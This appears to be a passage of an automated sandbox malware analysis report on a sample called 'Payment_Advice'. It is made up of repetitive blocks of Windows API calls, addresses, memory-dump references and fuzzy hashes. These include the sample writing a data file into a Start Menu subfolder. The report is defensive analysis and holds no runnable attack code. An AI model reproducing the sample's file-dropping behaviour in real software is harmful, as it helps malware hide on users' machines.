                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                  • String ID: 9
                                                  • API String ID: 1149667376-2366072709
                                                  • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                  • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                                  • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                  • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                  • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                                  • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                  • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 0040252D
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 00402534
                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000000,?,?,00000000,00000011), ref: 00402566
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                  • String ID: 8$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                                                  • API String ID: 1453599865-3010710425
                                                  • Opcode ID: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                                                  • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                                  • Opcode Fuzzy Hash: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
                                                  • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                                                  • GetTickCount.KERNEL32 ref: 00402D51
                                                  • wsprintfW.USER32 ref: 00402D7F
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                    • Part of subcall function 00402CFC: MulDiv.KERNEL32(0002C8A5,00000064,00031420), ref: 00402D11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                                                  • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                                  • Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
                                                  • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                                  • GetMessagePos.USER32 ref: 00404A7F
                                                  • ScreenToClient.USER32(?,?), ref: 00404A99
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                                                  • wsprintfW.USER32 ref: 00402CCF
                                                  • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                  • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                                  • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                  • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                                                  • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                                  • Opcode Fuzzy Hash: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
                                                  • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D44
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                  • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                                                  • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                                  • Opcode Fuzzy Hash: bdf0aea4df8e2e68d88040a8141e897e7d917dcd0e150930727cc730d68c84d5
                                                  • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                                  APIs
                                                  • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                                  • wsprintfW.USER32 ref: 00404A10
                                                  • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                                                  • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                                  • Opcode Fuzzy Hash: 4296bb9edf2789e867a9d2459d6d531fcd7c7c1783075924c57ec8259cd97d31
                                                  • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                  • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                                                  • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                  • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
                                                  • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: : Completed
                                                  • API String ID: 3677997916-2954849223
                                                  • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                  • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                                                  • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                  • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405939
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00405943
                                                  • lstrcatW.KERNEL32(?,00409014), ref: 00405955
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
